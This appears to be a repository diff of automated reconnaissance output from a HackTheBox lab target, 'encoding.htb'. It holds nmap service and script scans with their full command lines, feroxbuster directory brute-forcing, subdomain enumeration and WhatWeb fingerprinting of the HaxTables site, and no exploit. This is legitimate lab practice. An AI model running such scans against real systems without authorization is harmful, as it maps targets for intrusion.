177/udp open|filtered xdmcp no-response
520/udp open|filtered route no-response
593/udp open|filtered http-rpc-epmap no-response
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
3703/udp open|filtered adobeserver-3 no-response
4500/udp open|filtered nat-t-ike no-response
49186/udp open|filtered unknown no-response
49190/udp open|filtered unknown no-response
49192/udp open|filtered unknown no-response
49193/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 49152/udp)
HOP RTT ADDRESS
1 25.83 ms 10.10.14.1
2 26.04 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:11:00 2023 -- 1 IP address (1 host up) scanned in 243.96 seconds

60
HTB/encoding/results/scans/tcp22/tcp_22_ssh_nmap.txt Normal file
View File

@@ -0,0 +1,60 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.039s latency).
Scanned at 2023-01-28 20:07:26 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:28 2023 -- 1 IP address (1 host up) scanned in 2.73 seconds

94
HTB/encoding/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml Normal file
View File

@@ -0,0 +1,94 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2" start="1674932845" startstr="Sat Jan 28 20:07:25 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="SYN Stealth Scan" time="1674932846"/>
<taskend task="SYN Stealth Scan" time="1674932846" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674932846"/>
<taskend task="Service scan" time="1674932846" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932848"/>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<host starttime="1674932846" endtime="1674932848"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="banner" output="SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"/><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (10)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; sntrup761x25519-sha512@openssh.com&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (4)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>sntrup761x25519-sha512@openssh.com</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
<elem key="bits">256</elem>
</table>
</script></port>
</ports>
<times srtt="39071" rttvar="39071" to="195355"/>
</host>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<runstats><finished time="1674932848" timestr="Sat Jan 28 20:07:28 2023" summary="Nmap done at Sat Jan 28 20:07:28 2023; 1 IP address (1 host up) scanned in 2.73 seconds" elapsed="2.73" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

1
HTB/encoding/results/scans/tcp80/ferox-http_api_haxtables_htb-1674933786.state Normal file
View File

@@ -0,0 +1 @@
{"scans":[{"id":"a57702627b854c1c90ad3f96ec543203","url":"http://api.haxtables.htb/","normalized_url":"http://api.haxtables.htb/","scan_type":"Directory","status":"Running","num_requests":30000},{"id":"6809b17a31a54a36b557f8cf36b3e463","url":"http://api.haxtables.htb/v2/","normalized_url":"http://api.haxtables.htb/v2/","scan_type":"Directory","status":"Complete","num_requests":30000},{"id":"e94a0fafa13a47819bc2bf530faad678","url":"http://api.haxtables.htb/v3/","normalized_url":"http://api.haxtables.htb/v3/","scan_type":"Directory","status":"Complete","num_requests":30000},{"id":"2f4dbdcce1364f6099c72ab7ac0b0127","url":"http://api.haxtables.htb/v1/","normalized_url":"http://api.haxtables.htb/v1/","scan_type":"Directory","status":"Complete","num_requests":30000}],"config":{"type":"configuration","wordlist":"/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://api.haxtables.htb","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":50,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":false,"extensions":[],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":false,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://api.haxtables.htb/","original_url":"http://api.haxtables.htb","path":"/","wildcard":false,"status":200,"method":"GET","content_length":0,"line_count":0,"word_count":0,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=UTF-8","content-length":"0","date":"Sat, 28 Jan 2023 19:22:46 GMT"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v2","original_url":"http://api.haxtables.htb","path":"/v2","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1","location":"http://api.haxtables.htb/v2/","date":"Sat, 28 Jan 2023 19:22:46 GMT","content-length":"319"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v3","original_url":"http://api.haxtables.htb","path":"/v3","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"content-length":"319","content-type":"text/html; charset=iso-8859-1","date":"Sat, 28 Jan 2023 19:22:46 GMT","server":"Apache/2.4.52 (Ubuntu)","location":"http://api.haxtables.htb/v3/"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v1","original_url":"http://api.haxtables.htb","path":"/v1","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1","date":"Sat, 28 Jan 2023 19:22:46 GMT","content-length":"319","location":"http://api.haxtables.htb/v1/"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/server-status","original_url":"http://api.haxtables.htb","path":"/server-status","wildcard":false,"status":403,"method":"GET","content_length":282,"line_count":9,"word_count":28,"headers":{"content-length":"282","date":"Sat, 28 Jan 2023 19:22:48 GMT","server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1"},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":7411,"expected_per_scan":30000,"total_expected":120000,"errors":12,"successes":7,"redirects":3,"client_errors":7389,"server_errors":0,"total_scans":4,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":7,"status_301s":3,"status_302s":0,"status_401s":0,"status_403s":1,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":5,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":12,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]}

56
HTB/encoding/results/scans/tcp80/tcp_80_http_curl.html Normal file
View File

@@ -0,0 +1,56 @@
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HaxTables</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="assets/css/main.css">
<script src="./assets/js/main.js"></script>
</head>
<body>
<h1 align="center">HaxTables</h1>
<br><br>
<div class="container">
<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">HaxTables</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
<li class="dropdown"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Convertions<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/index.php?page=string">String</a></li>
<li><a href="/index.php?page=integer">Integer</a></li>
<li><a href="/index.php?page=image">Images</a></li>
</ul>
</li>
<li><a href="#">About us</a></li>
<li><a href="/index.php?page=api">API</a></li>
</ul>
</div>
</nav>
<p align="center">Free online String and Number converter. Just load your input and they will automatically get converted to selected format. A collection of useful utilities for working with String and Integer values. All are simple, free and easy to use. There are no ads, popups or other garbage!</p>
<p align="center">
<img src="../assets/img/index.png">
</p>
</div>
</body>
</html>

0
HTB/encoding/results/scans/tcp80/tcp_80_http_encoding.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

32
HTB/encoding/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt Normal file
View File

@@ -0,0 +1,32 @@
403 GET 9l 28w 277c http://10.129.123.2/.htaccess
403 GET 9l 28w 277c http://10.129.123.2/.hta
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.txt
403 GET 9l 28w 277c http://10.129.123.2/.hta.txt
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.txt
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.html
403 GET 9l 28w 277c http://10.129.123.2/.hta.html
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.html
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.php
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.asp
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.asp
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.asp
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.aspx
403 GET 9l 28w 277c http://10.129.123.2/.hta.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.jsp
403 GET 9l 28w 277c http://10.129.123.2/.hta.jsp
200 GET 48l 137w 0c http://10.129.123.2/index.php
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.jsp
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
200 GET 1l 2w 0c http://10.129.123.2/handler.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
403 GET 9l 28w 277c http://10.129.123.2/server-status

32
HTB/encoding/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt Normal file
View File

@@ -0,0 +1,32 @@
200 GET 48l 137w 0c http://10.129.123.2/index.php
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/css/ (Apache)
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/js/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/img (Apache)
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
200 GET 48l 137w 0c http://10.129.123.2/
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
200 GET 5l 53w 375c http://10.129.123.2/includes/index.html
200 GET 1l 2w 20c http://10.129.123.2/includes/image.html
200 GET 110l 344w 3672c http://10.129.123.2/includes/api.html
200 GET 48l 137w 0c http://10.129.123.2/index.php
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/css/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/js/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/ (Apache)
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/img/ (Apache)
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
200 GET 5l 53w 375c http://10.129.123.2/includes/index.html
200 GET 1l 2w 20c http://10.129.123.2/includes/image.html
200 GET 110l 344w 3672c http://10.129.123.2/includes/api.html

2
HTB/encoding/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

@@ -0,0 +1,2 @@
api
image

140
HTB/encoding/results/scans/tcp80/tcp_80_http_nmap.txt Normal file
View File

@@ -0,0 +1,140 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.025s latency).
Scanned at 2023-01-28 20:07:26 CET for 160s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-mobileversion-checker: No mobile version detected.
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
| https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
|_ https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-feed: Couldn't find any feeds.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-headers:
| Date: Sat, 28 Jan 2023 19:07:19 GMT
| Server: Apache/2.4.52 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 29
| Comment:
| /* The textarea itself */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 14
| Comment:
| /* Containing areas */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 41
| Comment:
| /* The status bar */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 1
| Comment:
| /* Import Google Font */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 63
| Comment:
| /* The submit button */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 4
| Comment:
|_ /* RESET */
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-errors: Couldn't find any error pages.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /assets/css/
| css: 1
| /assets/img/
| png: 1
| /assets/js/
| js: 1
| Longest directory structure:
| Depth: 2
| Dir: /assets/img/
| Total files found (by extension):
|_ Other: 1; css: 1; js: 1; php: 1; png: 1
|_http-date: Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-traceroute:
| HTML title
| Hop #1: 400 Proxy Error
| Hop #2: HaxTables
| Hop #3: HaxTables
| Status Code
| Hop #1: 400
| Hop #2: 200
| Hop #3: 200
| content-type
| Hop #1: text/html; charset=iso-8859-1
| Hop #2: text/html; charset=UTF-8
| Hop #3: text/html; charset=UTF-8
| content-length
| Hop #1: 424
| Hop #2
|_ Hop #3
|_http-title: HaxTables
|_http-malware-host: Host appears to be clean
| http-enum:
|_ /includes/: Potentially interesting folder
| http-php-version: Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-chrono: Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms
| http-vhosts:
|_128 names had status 200
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:10:06 2023 -- 1 IP address (1 host up) scanned in 160.94 seconds

BIN
HTB/encoding/results/scans/tcp80/tcp_80_http_screenshot.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.3 MiB

71
HTB/encoding/results/scans/tcp80/tcp_80_http_whatweb.txt Normal file
View File

@@ -0,0 +1,71 @@
WhatWeb report for http://10.129.123.2:80
Status : 200 OK
Title : HaxTables
IP : 10.129.123.2
Country : RESERVED, ZZ
Summary : Apache[2.4.52], Bootstrap[3.4.1], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery[3.6.0], Script, X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.4.1
Version : 3.4.1
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.6.0
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:10 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
